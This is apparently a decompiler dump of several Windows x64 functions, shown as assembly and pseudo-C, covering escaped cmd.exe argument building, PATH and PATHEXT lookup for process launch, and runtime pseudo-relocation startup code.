*(unaff_RBP + 2) = 0;
uVar8 = 0x68;
}
goto code_r0x00014001ef60;
}
if (0x11 < uVar10) goto code_r0x00014001ef44;
*(iVar14 + uVar10) = *(uVar13 + "%H:%M:%S ");
code_r0x00014001edbe:
uVar12 = uVar10 + 1;
code_r0x00014001eed5:
uVar13 = uVar13 + 1;
uVar10 = uVar12;
} while( true );
}
0x14001C971 sub_14001c971 str 3 api 0 imm 26 Unknown
sub_14001c971() {
push rbp
push r15
push r14
push r13
push r12
push rsi
push rdi
push rbx
sub rsp, 0xE8
lea rbp, [rsp+0x80]
mov r14, r9
mov r15, r8
mov rsi, rdx
mov rdi, rcx
mov rdx, [rdx+0x10]
test rdx, rdx
jz .1
mov r8, [rsi+0x18]
lea rcx, [rsi+0x40]
call sub_14001cd80()
.1:
lea rdx, [rsi+0x40]
mov rbx, [rsi+0x30]
mov [rbp+0x08], rsi
mov r12, [rsi+0x38]
lea rsi, [rbp-0x58]
push 0x40
pop r8
mov rcx, rsi
mov [rbp], rdx
call sub_140015c37()
movzx r13d, word ptr [rsi+0x28]
test r13w, r13w
jnz .26
movups xmm0, [rbp-0x58]
movups xmm1, [rbp-0x48]
movaps [rbp+0x20], xmm0
mov rax, [rbp-0x38]
mov [rbp+0x40], rax
movaps [rbp+0x30], xmm1
mov rax, [rbp+0x20]
mov rcx, [rbp+0x28]
movups xmm0, [0x140055714]
movups [rax+rcx*1+0x0C], xmm0
movups xmm0, ["cmd.exe /d /e:ON /v:OFF /c \""]
movups [rax+rcx*1], xmm0
lea rdx, [rcx+0x1D]
mov [rbp+0x28], rdx
mov byte ptr [rax+rcx*1+0x1C], 0x22
test r14, r14
jz .3
xor eax, eax
.2:
cmp r14, rax
jz .3
movzx ecx, word ptr [r15+rax*2]
cmp ecx, 0x2F
jz .4
cmp ecx, 0x5C
jz .4
inc rax
jmp .2
.3:
lea rdx, [0x140055725]
lea rcx, [rbp+0x20]
push 0x02
pop r8
call sub_14000f18b()
test ax, ax
jnz .32
.4:
lea rcx, [rbp+0x20]
mov rdx, r14
call sub_140015c96()
test ax, ax
jnz .32
lea rcx, [rbp+0x20]
mov rdx, r15
mov r8, r14
call sub_140018bf0()
test ax, ax
jnz .32
add rbx, 0x10
dec r12
lea r14, [rbp+0x20]
mov rax, [r14]
mov rcx, [r14+0x08]
lea rdx, [rcx+0x01]
mov [r14+0x08], rdx
mov byte ptr [rax+rcx*1], 0x22
xor esi, esi
lea r9, [0x140055728]
mov [rbp-0x08], r12
.5:
cmp rsi, r12
jz .30
mov rax, rsi
shl rax, 0x04
mov r12, [rbx+rax*1]
mov r15, [rbx+rax*1+0x08]
test r15, r15
jz .9
xor eax, eax
.6:
cmp rax, r15
jz .9
mov cl, [r12+rax*1]
xor edx, edx
.7:
cmp rdx, 0x03
jz .8
lea r8, [rdx+0x01]
cmp cl, [rdx+r9*1]
mov rdx, r8
jnz .7
jmp .24
.8:
inc rax
jmp .6
.9:
mov rcx, r14
mov dl, 0x20
call sub_14001ff31()
test ax, ax
jnz .32
test r15, r15
mov r8, 0x1200000030801D83
jz .10
cmp byte ptr [r12+r15*1-0x01], 0x5C
jnz .11
.10:
mov rcx, r14
mov dl, 0x22
call sub_14001ff31()
mov r13d, eax
mov al, 0x01
mov [rbp+0x4C], eax
test r13w, r13w
jz .16
jmp .25
.11:
xor eax, eax
.12:
cmp r15, rax
jz .15
movzx ecx, byte ptr [r12+rax*1]
lea edx, [rcx-0x23]
cmp edx, 0x3C
jnbe .14
bt r8, rdx
jnb .14
.13:
inc rax
jmp .12
.14:
lea edx, [rcx-0x30]
cmp dl, 0x0A
jb .13
and cl, 0xDF
add cl, 0xBF
cmp cl, 0x1A
jb .13
jmp .10
.15:
mov dword ptr [rbp+0x4C], 0x00
.16:
mov [rbp+0x18], rsi
mov [rbp+0x10], rbx
mov [rbp+0x50], rdi
xor esi, esi
xor edi, edi
mov [rbp-0x10], r15
.17:
cmp r15, rdi
jz .22
movzx ebx, byte ptr [r12+rdi*1]
cmp ebx, 0x22
jz .20
cmp ebx, 0x25
jz .18
cmp ebx, 0x5C
jnz .19
inc rsi
jmp .21
.18:
mov rcx, r14
lea rdx, ["%%cd:~,"]
push 0x07
pop r8
call sub_14000f18b()
test ax, ax
jnz .31
.19:
xor esi, esi
jmp .21
.20:
mov r15, r12
mov r12, r14
mov r14, [rbp+0x28]
add rsi, r14
setb al
setb byte ptr [rbp+0x60]
setb byte ptr [rbp+0x5F]
test al, al
jnz .28
mov rcx, r12
mov rdx, rsi
call sub_14001c503()
test ax, ax
jnz .31
mov r8, [rbp+0x28]
mov rcx, [rbp+0x20]
add rcx, r14
sub r8, r14
mov dl, 0x5C
call sub_140021d8e()
mov rcx, r12
mov dl, 0x22
call sub_14001ff31()
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
undefined8 * sub_14001c971(undefined8 *param_1,int64_t param_2,int64_t param_3,int64_t param_4)
{
char *pcVar1;
undefined4 *puVar2;
uint8_t uVar3;
char cVar4;
int64_t iVar5;
undefined4 uVar6;
undefined4 uVar7;
undefined4 uVar8;
uint64_t uVar9;
int16_t iVar10;
int64_t iVar11;
undefined8 uVar12;
int64_t iVar13;
uint64_t uVar14;
int64_t iVar15;
int64_t iVar16;
int64_t iVar17;
undefined4 uStack_100;
undefined4 uStack_fc;
undefined4 uStack_f8;
undefined4 uStack_f4;
undefined4 uStack_f0;
undefined4 uStack_ec;
undefined4 uStack_e8;
undefined4 uStack_e4;
undefined8 uStack_e0;
int16_t iStack_d8;
undefined8 uStack_d0;
undefined8 uStack_c8;
int16_t iStack_c0;
int64_t iStack_b8;
int64_t iStack_b0;
int64_t iStack_a8;
int64_t iStack_a0;
int64_t iStack_98;
int64_t iStack_90;
undefined4 uStack_88;
undefined4 uStack_84;
uint64_t uStack_80;
undefined4 uStack_78;
undefined4 uStack_74;
undefined4 uStack_70;
undefined4 uStack_6c;
undefined8 uStack_68;
undefined4 uStack_5c;
undefined8 *puStack_58;
undefined uStack_49;
undefined uStack_48;
if (*(param_2 + 0x10) != 0) {
sub_14001cd80(param_2 + 0x40, *(param_2 + 0x10), *(param_2 + 0x18));
}
iStack_a8 = param_2 + 0x40;
iVar13 = *(param_2 + 0x30);
iVar16 = *(param_2 + 0x38);
iStack_a0 = param_2;
sub_140015c37(&uStack_100, iStack_a8, 0x40);
uVar8 = [0x0x140055720];
uVar7 = [0x0x14005571c];
uVar6 = [0x0x140055718];
iVar10 = iStack_d8;
if (iStack_d8 == 0) {
uStack_88 = uStack_100;
uStack_84 = uStack_fc;
uStack_80 = CONCAT44(uStack_f4, uStack_f8);
uStack_68 = uStack_e0;
uStack_78 = uStack_f0;
uStack_74 = uStack_ec;
uStack_70 = uStack_e8;
uStack_6c = uStack_e4;
iVar11 = CONCAT44(uStack_fc, uStack_100);
puVar2 = iVar11 + 0xc + uStack_80;
*puVar2 = [0x0x140055714];
puVar2[1] = uVar6;
puVar2[2] = uVar7;
puVar2[3] = uVar8;
uVar8 = [0x0x140055714];
uVar7 = [0x0x140055710];
uVar6 = [0x0x14005570c];
puVar2 = iVar11 + uStack_80;
*puVar2 = ["cmd.exe /d /e:ON /v:OFF /c \""];
puVar2[1] = uVar6;
puVar2[2] = uVar7;
puVar2[3] = uVar8;
uVar14 = uStack_80 + 0x1d;
*(iVar11 + 0x1c + uStack_80) = 0x22;
uStack_80 = uVar14;
if (param_4 != 0) {
for (iVar11 = 0; param_4 != iVar11; iVar11 = iVar11 + 1) {
iVar10 = *(param_3 + iVar11 * 2);
if ((iVar10 == 0x2f) || (iVar10 == 0x5c)) goto code_r0x00014001ca62;
}
}
iVar10 = sub_14000f18b(&uStack_88, 0x140055725, 2);
if (iVar10 == 0) {
code_r0x00014001ca62:
iVar10 = sub_140015c96(&uStack_88, param_4);
if ((iVar10 == 0) && (iVar10 = sub_140018bf0(&uStack_88, param_3, param_4), iVar10 == 0)) {
iVar13 = iVar13 + 0x10;
iVar16 = iVar16 + -1;
*(CONCAT44(uStack_84, uStack_88) + uStack_80) = 0x22;
iVar11 = 0;
iStack_b0 = iVar16;
uStack_80 = uStack_80 + 1;
while (iVar11 != iVar16) {
iVar5 = *(iVar13 + iVar11 * 0x10);
iVar17 = *(iVar13 + 8 + iVar11 * 0x10);
if (iVar17 != 0) {
for (iVar16 = 0; iVar16 != iVar17; iVar16 = iVar16 + 1) {
iVar15 = 0;
while (iVar15 != 3) {
pcVar1 = iVar15 + 0x140055728;
iVar15 = iVar15 + 1;
if (*(iVar5 + iVar16) == *pcVar1) {
iVar10 = 0x4d;
goto code_r0x00014001ccdc;
}
}
}
}
iVar10 = sub_14001ff31(&uStack_88);
if (iVar10 != 0) goto code_r0x00014001ccdc;
if ((iVar17 == 0) || (*(iVar5 + -1 + iVar17) == '\\')) {
code_r0x00014001cb2c:
uVar12 = sub_14001ff31(&uStack_88);
iVar10 = uVar12;
uStack_5c = CONCAT71(uVar12 >> 8, 1);
if (iVar10 != 0) goto code_r0x00014001ccdc;
}
else {
for (iVar16 = 0; iVar17 != iVar16; iVar16 = iVar16 + 1) {
uVar3 = *(iVar5 + iVar16);
if ((((0x3c < uVar3 - 0x23) || ((0x1200000030801d83U >> (uVar3 - 0x23 & 0x3f) & 1) == 0)) &&
(9 < uVar3 - 0x30)) && (0x19 < (uVar3 & 0xdf) + 0xbf)) goto code_r0x00014001cb2c;
}
uStack_5c = 0;
}
uVar14 = 0;
iVar15 = 0;
iStack_b8 = iVar17;
iStack_98 = iVar13;
iStack_90 = iVar11;
puStack_58 = param_1;
while (uVar9 = uStack_80, iVar13 = iStack_98, iVar16 = iStack_b0, iVar17 != iVar15) {
cVar4 = *(iVar5 + iVar15);
if (cVar4 == '\"') {
uStack_49 = CARRY8(uVar14, uStack_80);
if (uStack_49 != false) goto code_r0x00014001cd01;
uStack_48 = uStack_49;
iVar10 = sub_14001c503(&uStack_88, uVar14 + uStack_80);
param_1 = puStack_58;
if (iVar10 != 0) goto code_r0x00014001ccdc;
sub_140021d8e(CONCAT44(uStack_84, uStack_88) + uVar9, 0x5c, uStack_80 - uVar9);
iVar10 = sub_14001ff31(&uStack_88, 0x22);
param_1 = puStack_58;
if (iVar10 != 0) goto code_r0x00014001ccdc;
uVar14 = 0;
iVar17 = iStack_b8;
}
else {
if (cVar4 == '%') {
iVar10 = sub_14000f18b(&uStack_88, "%%cd:~,", 7);
param_1 = puStack_58;
if (iVar10 != 0) goto code_r0x00014001ccdc;
}
else if (cVar4 == '\\') {
uVar14 = uVar14 + 1;
goto code_r0x00014001cc45;
}
uVar14 = 0;
}
code_r0x00014001cc45:
iVar10 = sub_14001ff31(&uStack_88);
iVar15 = iVar15 + 1;
param_1 = puStack_58;
if (iVar10 != 0) goto code_r0x00014001ccdc;
}
if (uStack_5c != '\0') {
uStack_49 = CARRY8(uVar14, uStack_80);
if (uStack_49 != false) {
code_r0x00014001cd01:
uStack_49 = CARRY8(uVar14, uStack_80);
iVar10 = 1;
param_1 = puStack_58;
uStack_48 = uStack_49;
goto code_r0x00014001ccdc;
}
uStack_48 = uStack_49;
iVar10 = sub_14001c503(&uStack_88, uVar14 + uStack_80);
param_1 = puStack_58;
if (iVar10 != 0) goto code_r0x00014001ccdc;
sub_140021d8e(CONCAT44(uStack_84, uStack_88) + uVar9, 0x5c, uStack_80 - uVar9);
iVar10 = sub_14001ff31(&uStack_88);
param_1 = puStack_58;
if (iVar10 != 0) goto code_r0x00014001ccdc;
}
param_1 = puStack_58;
iVar11 = iStack_90 + 1;
}
iVar10 = sub_14001ff31(&uStack_88, 0x22);
if ((iVar10 == 0) &&
(sub_14001dfe1(&uStack_d0, iStack_a8, CONCAT44(uStack_84, uStack_88), uStack_80), iVar10 = iStack_c0,
iStack_c0 == 0)) {
sub_14000f1d9(&uStack_88);
*(iStack_a0 + 0x10) = uStack_d0;
*(iStack_a0 + 0x18) = uStack_c8;
*(param_1 + 2) = 0;
*param_1 = uStack_d0;
param_1[1] = uStack_c8;
return param_1;
}
}
}
code_r0x00014001ccdc:
/* listing truncated */0x1400190FA sub_1400190fa str 3 api 0 imm 23 Unknown
sub_1400190fa() {
lea rcx, [rbp+0x398]
lea rdx, [rbp+0x3B0]
lea r8, [rbp+0x290]
call sub_14001c7a9()
test ax, ax
jnz .140
and qword ptr [rbp+0x390], 0x00
and qword ptr [rbp+0x3A8], 0x00
xor esi, esi
movzx eax, byte ptr [r14+0xFA]
and eax, 0x03
lea rcx, [0x1400247C0]
movsxd rax, dword ptr [rcx+rax*4]
add rax, rcx
jmp rax
loc_14001917e:
xor eax, eax
loc_140019180:
and qword ptr [rbp+0x390], 0x00
and qword ptr [rbp+0x3A8], 0x00
mov [rbp+0x3B0], rax
xor esi, esi
movzx eax, byte ptr [r14+0xFA]
and eax, 0x03
lea rcx, [0x1400247C0]
movsxd rax, dword ptr [rcx+rax*4]
add rax, rcx
jmp rax
.3:
xor r9d, r9d
jmp .5
.4:
mov rcx, rbx
mov rdx, r14
call sub_14000f786()
mov r8, rax
mov r9, rdx
xor r14d, r14d
.5:
test r8, r8
mov [rbp+0x308], r12b
jz .6
lea rdi, [r15+0x10]
lea rbx, [rbp+0x110]
mov rcx, rbx
mov rdx, rdi
call sub_14001dfe1()
movzx esi, word ptr [rbx+0x10]
test si, si
jnz .130
mov rax, [rbp+0x110]
mov [rbp+0x358], rax
mov rax, [rbp+0x118]
mov [rbp+0x350], rax
jmp .7
.6:
mov qword ptr [rbp+0x358], 0x00
mov qword ptr [rbp+0x350], 0x00
.7:
mov [rbp+0x318], r14d
lea r12, [r15+0x10]
lea rdi, [rbp+0xF8]
mov rcx, rdi
mov rdx, r12
mov r8, [rbp+0x368]
mov r9, r13
call sub_14001dfe1()
movzx esi, word ptr [rdi+0x10]
test si, si
jnz .115
mov rdi, [rbp+0xF8]
mov rsi, [rbp+0x100]
lea rcx, ["PATH"]
call sub_1400170b0()
mov [rbp+0x208], rax
mov [rbp+0x200], rdx
lea rcx, ["PATHEXT"]
call sub_1400170b0()
mov rbx, rax
mov r14, rdx
movups xmm0, [r15+0x50]
movups xmm1, [r12]
movaps [rbp+0x280], xmm1
xorps xmm1, xmm1
movaps [rbp+0x240], xmm1
movaps [rbp+0x250], xmm1
movaps [rbp+0x260], xmm1
movaps [rbp+0x270], xmm0
movups xmm6, [0x140055830]
lea rcx, [rbp+0x2F0]
movaps [rcx], xmm6
and qword ptr [rcx+0x10], 0x00
mov rdx, r12
mov [rbp+0x368], rdi
mov r8, rdi
mov r9, rsi
call sub_14001dea1()
test ax, ax
mov r13, [rbp+0x340]
jnz .119
movaps [rbp+0x320], xmm6
and qword ptr [rbp+0x330], 0x00
test r13, r13
mov rdi, [rbp+0x358]
jz .8
lea rcx, [rbp+0x320]
mov rdx, r12
mov r8, [rbp+0x378]
mov r9, r13
call sub_14001dea1()
test ax, ax
jnz .137
.8:
test rdi, rdi
jz .10
cmp qword ptr [rbp+0x328], 0x00
jz .9
lea rcx, [rbp+0x320]
mov rdx, r12
mov r8w, 0x5C
call sub_14001dd2a()
test ax, ax
jnz .114
.9:
lea rcx, [rbp+0x320]
mov rdx, r12
mov r8, rdi
mov r9, [rbp+0x350]
call sub_14001dea1()
test ax, ax
jnz .114
.10:
mov [rbp+0x348], rsi
mov rsi, r12
mov r8, [rbp+0x328]
test r8, r8
jz .12
mov rdx, [rbp+0x320]
lea rdi, [rbp+0xE8]
mov rcx, rdi
call sub_14001bf4d()
cmp word ptr [rdi+0x08], 0x00
jz .11
lea rcx, [rbp+0x320]
mov rbx, rsi
mov rdx, rsi
call sub_14001e27a()
lea rcx, [rbp+0x2F0]
mov rdx, rsi
call sub_14001e27a()
lea rcx, [rbp+0x240]
call sub_14001e2a4()
mov rcx, rsi
mov rdx, [rbp+0x368]
mov r8, [rbp+0x348]
call sub_14001cd80()
mov rdx, [rbp+0x358]
test rdx, rdx
jz .30
mov rcx, rbx
mov r8, [rbp+0x350]
call sub_14001cd80()
cmp byte ptr [rbp+0x3CF], 0x00
jmp .31
.11:
mov rax, [rbp+0xE8]
mov [rbp+0x328], rax
.12:
test rbx, rbx
lea rdi, [0x140055528]
mov r12, rbx
cmovz r12, rdi
cmovz r14, rbx
lea rax, [rbp+0x1B0]
mov [rsp+0x48], rax
lea rax, [rbp+0x70]
mov [rsp+0x40], rax
mov rax, [rbp+0x3B8]
mov [rsp+0x38], rax
mov rax, [rbp+0x3C0]
mov [rsp+0x30], rax
lea rax, [rbp+0x240]
mov [rsp+0x28], rax
mov [rbp+0x308], r14
mov [rsp+0x20], r14
lea rdx, [rbp+0x320]
lea r8, [rbp+0x2F0]
mov rcx, rsi
mov r9, r12
call sub_14001d3a4()
test ax, ax
jz .40
movzx ecx, ax
cmp ecx, 0x05
jz .21
cmp ecx, 0x1B
jz .21
cmp ecx, 0x4E
jz .21
cmp ecx, 0x64
mov r14d, [rbp+0x3C8]
jz .50
cmp ecx, 0x65
jnz .59
lea rcx, [rbp+0x320]
mov rdx, rsi
call sub_14001e27a()
lea rcx, [rbp+0x2F0]
mov rdx, rsi
call sub_14001e27a()
lea rcx, [rbp+0x240]
call sub_14001e2a4()
mov rcx, rsi
mov rdx, [rbp+0x368]
mov r8, [rbp+0x348]
call sub_14001cd80()
mov rdx, [rbp+0x358]
test rdx, rdx
jz .13
; listing truncated
/* WARNING: Type propagation algorithm not settling */
/* DISPLAY WARNING: Type casts are NOT being printed */
uint64_t sub_1400190fa(void)
{
undefined4 *puVar1;
undefined8 *puVar2;
undefined2 *puVar3;
uint16_t uVar4;
code **ppcVar5;
char *pcVar6;
uint64_t uVar7;
uint64_t uVar8;
undefined4 uVar9;
undefined4 uVar10;
undefined4 uVar11;
undefined4 uVar12;
undefined4 uVar13;
undefined4 uVar14;
bool bVar15;
uint32_t uVar16;
int64_t iVar17;
undefined8 uVar18;
undefined8 uVar19;
uint32_t uVar20;
char *pcVar21;
char *pcVar22;
undefined4 *puVar23;
undefined8 *puVar24;
unkbyte6 Var26;
undefined8 uVar25;
undefined8 *unaff_RBP;
char cVar27;
int64_t iVar28;
undefined4 unaff_EDI;
bool bVar29;
undefined8 unaff_R13;
int64_t iVar30;
uint64_t uVar31;
undefined4 *unaff_R14;
undefined8 unaff_R15;
undefined4 extraout_XMM0_Da;
undefined4 extraout_XMM0_Da_00;
undefined4 uVar32;
uVar16 = sub_14001c7a9(unaff_RBP + 0x73, unaff_RBP + 0x76, unaff_RBP + 0x52);
cVar27 = unaff_EDI;
if (uVar16 == 0) {
unaff_RBP[0x72] = 0;
unaff_RBP[0x75] = 0;
uVar18 = 0;
switch(*(unaff_R14 + 0xfa) & 3) {
case :
sub_14001df9b(unaff_RBP + 0x2e, 0xfffffffffffffff4);
if (*(unaff_RBP + 0x2f) == 0) {
uVar18 = unaff_RBP[0x2e];
}
else {
uVar18 = 0;
}
unaff_RBP[0x75] = uVar18;
break;
case :
unaff_RBP[0x75] = unaff_R13;
uVar18 = unaff_R13;
break;
case :
uVar16 = sub_14001c7a9(unaff_RBP + 0x72, unaff_RBP + 0x75, unaff_RBP + 0x52);
if (uVar16 == 0) {
uVar18 = unaff_RBP[0x75];
break;
}
uVar31 = uVar16;
uVar32 = extraout_XMM0_Da_00;
if ((*(unaff_R14 + 0xf9) & 3) == 2) {
uVar32 = sub_14001c776(unaff_RBP[0x73], unaff_RBP[0x76]);
}
if ((*(unaff_R14 + 0x3e) & 3) == 2) {
sub_14001c776(uVar32, unaff_RBP[0x74]);
}
if (cVar27 == '\0') goto code_r0x000140018e31;
goto code_r0x00014001aee3;
}
*(unaff_RBP + 0x79) = unaff_EDI;
uVar25 = unaff_RBP[0x76];
*(unaff_RBP + 0xe) = 0x68;
*(unaff_RBP + 0xf) = ZEXT816(0);
*(unaff_RBP + 0x11) = ZEXT816(0);
*(unaff_RBP + 0x13) = ZEXT816(0);
*(unaff_RBP + 0x15) = 0;
*(unaff_RBP + 0xac) = 0x100;
unaff_RBP[0x17] = 0;
unaff_RBP[0x18] = unaff_R15;
unaff_RBP[0x19] = uVar25;
unaff_RBP[0x1a] = uVar18;
iVar30 = *(unaff_R14 + 0x1a);
unaff_RBP[0x6e] = unaff_R15;
if (iVar30 == 0) {
unaff_RBP[0x77] = 0;
unaff_RBP[0x70] = 0;
}
else {
uVar32 = sub_14001dfe1(unaff_RBP + 0x2b, unaff_R14 + 4, iVar30, *(unaff_R14 + 0x1c));
uVar31 = *(unaff_RBP + 0x2d);
if (*(unaff_RBP + 0x2d) != 0) {
if ((*(unaff_R14 + 0xfa) & 3) == 2) {
uVar32 = sub_14001c776(unaff_RBP[0x72], uVar18);
}
if ((*(unaff_R14 + 0xf9) & 3) == 2) {
uVar32 = sub_14001c776(unaff_RBP[0x73], uVar25);
}
if ((*(unaff_R14 + 0x3e) & 3) == 2) {
sub_14001c776(uVar32, unaff_RBP[0x74]);
}
if (*(unaff_RBP + 0x79) != '\0') {
jmp_ntdll.NtClose();
}
goto code_r0x000140018e31;
}
unaff_RBP[0x77] = unaff_RBP[0x2b];
unaff_RBP[0x70] = unaff_RBP[0x2c];
}
iVar30 = *(unaff_R14 + 0x18);
unaff_RBP[0x6d] = 0xaaaaaaaaaaaaaaaa;
unaff_RBP[0x6c] = unaff_R13;
if (iVar30 != 0) {
uVar32 = unaff_R14[4];
uVar9 = unaff_R14[5];
uVar10 = unaff_R14[6];
uVar11 = unaff_R14[7];
unaff_RBP[6] = iVar30;
*(unaff_RBP + 7) = 0;
unaff_RBP[99] = unaff_R14;
unaff_RBP[0x6b] = unaff_R14 + 4;
*(unaff_RBP + 0x5a) = uVar32;
*(unaff_RBP + 0x2d4) = uVar9;
*(unaff_RBP + 0x5b) = uVar10;
*(unaff_RBP + 0x2dc) = uVar11;
iVar28 = 4;
while (sub_140016656(unaff_RBP + 0x3d, unaff_RBP + 6), *(unaff_RBP + 0x3f) != '\0') {
iVar28 = iVar28 + *(unaff_RBP[0x3d] + 8) + *(unaff_RBP[0x3e] + 8) + 2;
}
sub_1400208b1(unaff_RBP + 8, unaff_RBP + 0x5a, iVar28);
uVar16 = *(unaff_RBP + 10);
if (*(unaff_RBP + 10) == 0) {
iVar28 = unaff_RBP[8];
unaff_RBP[0x78] = unaff_RBP[9];
unaff_RBP[0x58] = iVar30;
*(unaff_RBP + 0x59) = 0;
iVar30 = 0;
while (sub_140016656(unaff_RBP + 0x42, unaff_RBP + 0x58), *(unaff_RBP + 0x44) != '\0') {
puVar24 = unaff_RBP[0x43];
sub_14001740a(unaff_RBP + 0x5c, iVar28 + iVar30 * 2, *unaff_RBP[0x42], unaff_RBP[0x42][1]);
uVar16 = *(unaff_RBP + 0x5d);
if (*(unaff_RBP + 0x5d) != 0) goto code_r0x00014001949f;
iVar17 = unaff_RBP[0x5c];
puVar3 = iVar28 + (iVar30 + iVar17) * 2;
*puVar3 = 0x3d;
sub_14001740a(unaff_RBP + 0x56, puVar3 + 1, *puVar24, puVar24[1]);
uVar16 = *(unaff_RBP + 0x57);
if (*(unaff_RBP + 0x57) != 0) goto code_r0x00014001949f;
iVar17 = iVar30 + iVar17 + 1;
iVar30 = unaff_RBP[0x56];
*(iVar28 + (iVar30 + iVar17) * 2) = 0;
iVar30 = iVar30 + iVar17 + 1;
}
*(iVar28 + iVar30 * 2) = 0;
uVar31 = iVar30 + 4;
uVar18 = unaff_RBP[0x5a];
ppcVar5 = unaff_RBP[0x5b];
uVar25 = unaff_RBP[0x85];
iVar30 = unaff_RBP[0x78];
if (iVar30 == 0) {
unaff_RBP[0x1b] = uVar18;
unaff_RBP[0x1c] = ppcVar5;
sub_140015bbf(unaff_RBP + 0x39, unaff_RBP + 0x1b, uVar31, uVar25);
uVar16 = *(unaff_RBP + 0x3a);
if (*(unaff_RBP + 0x3a) == 0) {
unaff_RBP[0x71] = uVar31;
iVar30 = unaff_RBP[0x39];
goto code_r0x000140019668;
}
}
else {
*(unaff_RBP + 0x62) = uVar31 < 0;
if (uVar31 >= 0) {
uVar8 = iVar30 * 2;
uVar7 = uVar31 * 2;
iVar30 = (*ppcVar5[2])(uVar18, iVar28, uVar8, 1, uVar7);
if (iVar30 == 0) {
unaff_RBP[0x71] = uVar31;
iVar30 = (**ppcVar5)(uVar18, uVar7, 1, uVar25);
if (iVar30 == 0) goto code_r0x00014001949b;
uVar31 = uVar8;
if (uVar7 < uVar8) {
uVar31 = uVar7;
}
sub_140021d71(iVar30, iVar28, uVar31);
(*ppcVar5[3])(uVar18, iVar28, uVar8, 1, uVar25);
uVar31 = unaff_RBP[0x71];
}
uVar31 = uVar31 & 0x7fffffffffffffff;
if (uVar7 == 0) {
iVar30 = -0x5555555555555556;
uVar31 = 0;
}
unaff_RBP[0x71] = uVar31;
code_r0x000140019668:
unaff_RBP[0x78] = iVar30;
unaff_R14 = unaff_RBP[99];
goto code_r0x000140019676;
}
code_r0x00014001949b:
uVar16 = CONCAT62(iVar30 >> 0x10, 1);
}
code_r0x00014001949f:
sub_14000f147(unaff_RBP + 0x5a, iVar28, unaff_RBP[0x78]);
/* listing truncated */0x140021600 sub_140021600 str 3 api 0 imm 15 Unknown
sub_140021600() {
push rbp
push r15
push r14
push r13
push r12
push rsi
push rdi
push rbx
sub rsp, 0x18
lea rbp, [rsp+0x10]
cmp byte ptr [0x14005D240], 0x00
jnz .7
mov byte ptr [0x14005D240], 0x01
sub rsp, 0x20
call sub_140022753()
add rsp, 0x20
cdqe
lea rax, [rax+rax*4]
lea rax, [rax*8+0x0F]
and rax, 0xFFFFFFFFFFFFFFF0
call sub_140021d41()
sub rsp, rax
mov rax, rsp
mov [0x14005D248], rax
mov dword ptr [0x14005D250], 0x00
mov rdi, [0x140057010]
mov rax, rdi
sub rax, [0x140057018]
cmp rax, 0x07
jle .7
mov rbx, [0x140057018]
mov rax, rdi
sub rax, rbx
cmp rax, 0x0C
jl .1
mov rbx, [0x140057018]
cmp dword ptr [rbx], 0x00
jnz .2
mov rbx, [0x140057018]
cmp dword ptr [rbx+0x04], 0x00
jnz .2
mov rax, [0x140057018]
lea rbx, [rax+0x0C]
cmp dword ptr [rax+0x08], 0x00
cmovnz rbx, rax
.1:
cmp dword ptr [rbx], 0x00
jnz .2
cmp dword ptr [rbx+0x04], 0x00
jz .8
.2:
cmp rbx, [0x140057010]
jnb .4
mov r14, [0x140056C28]
lea rsi, [rbp+0x04]
.3:
mov eax, [rbx]
mov ecx, [rbx+0x04]
add eax, [rcx+r14*1]
add rcx, r14
mov [rbp+0x04], eax
sub rsp, 0x20
mov r8d, 0x04
mov rdx, rsi
call sub_1400218cf()
add rsp, 0x20
add rbx, 0x08
cmp rbx, rdi
jb .3
.4:
mov eax, [0x14005D250]
test eax, eax
jle .7
mov edi, 0x10
mov rdx, [0x14005D248]
xor ebx, ebx
lea rsi, [rbp-0x08]
mov r14, [kernel32.VirtualProtect]
.5:
mov r8d, [rdx+rdi*1-0x10]
test r8d, r8d
jz .6
mov rcx, [rdx+rdi*1-0x08]
mov rdx, [rdx+rdi*1]
sub rsp, 0x20
mov r9, rsi
call r14
add rsp, 0x20
mov rdx, [0x14005D248]
mov eax, [0x14005D250]
.6:
inc rbx
movsxd rcx, eax
add rdi, 0x28
cmp rbx, rcx
jl .5
.7:
lea rsp, [rbp+0x08]
pop rbx
pop rdi
pop rsi
pop r12
pop r13
pop r14
pop r15
pop rbp
ret
.8:
mov edx, [rbx+0x08]
cmp edx, 0x01
jnz .11
add rbx, 0x0C
cmp rbx, [0x140057010]
jnb .4
mov r14, [0x140056C28]
lea r15, [0x140056E68]
mov r12d, 0x8B
lea rsi, [rbp-0x08]
mov r13, 0xFFFFFFFF00000000
.9:
movzx edx, byte ptr [rbx+0x08]
lea r8d, [rdx-0x08]
rol r8d, 0x1D
cmp r8d, 0x07
jnbe .10
mov ecx, [rbx]
mov eax, [rbx+0x04]
add rax, r14
mov r9, [rcx+r14*1]
movsxd r10, dword ptr [r15+r8*4]
add r10, r15
jmp r10
sub rsp, 0x20
mov rcx, rax
mov rdx, rsi
call sub_1400218cf()
add rsp, 0x20
add rbx, 0x0C
cmp rbx, rdi
jb .9
jmp .4
sub rsp, 0x30
mov [rsp+0x20], r10
lea rcx, ["%d bit pseudo relocation at %p o..ting %p, yielding the value %p.\n"]
mov r8, rax
call sub_140021a60()
.10:
sub rsp, 0x20
lea rcx, [" Unknown pseudo relocation bit size %d.\n"]
call sub_140021a60()
.11:
sub rsp, 0x20
lea rcx, [" Unknown pseudo relocation protocol version %d.\n"]
call sub_140021a60()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_140021600(void)
{
uint8_t uVar1;
uint32_t uVar2;
int32_t iVar3;
undefined8 uVar4;
undefined8 uVar5;
code *pcVar6;
uint32_t *puVar7;
int32_t iVar8;
int64_t iVar9;
uint64_t *puVar10;
undefined *puVar11;
int64_t iVar12;
uint32_t *puVar13;
undefined *puVar14;
int64_t iVar16;
uint32_t uVar17;
uint64_t uVar18;
uint64_t uVar19;
bool bVar20;
undefined8 uStack_90;
undefined auStack_88 [8];
int64_t aiStack_80 [5];
undefined auStack_58 [8];
int64_t iStack_50;
int32_t iStack_44;
undefined *puVar15;
if ([0x0x14005d240] != '\0') {
return;
}
[0x0x14005d240] = 1;
aiStack_80[0] = 0x140021632;
sub_140022753();
aiStack_80[4] = 0x14002164d;
iVar9 = sub_140021d41();
puVar7 = 0x140057010;
iVar12 = [0x0x140056c28];
iVar9 = -iVar9;
puVar14 = auStack_58 + iVar9;
puRam000000014005d248 = auStack_58 + iVar9;
puVar15 = auStack_58 + iVar9;
[0x0x14005d250] = 0;
if (0x140057010 - 0x140057018 < 8) {
0x14005d248 = auStack_58 + iVar9;
[0x0x14005d250] = 0;
return;
}
puVar13 = 0x140057018;
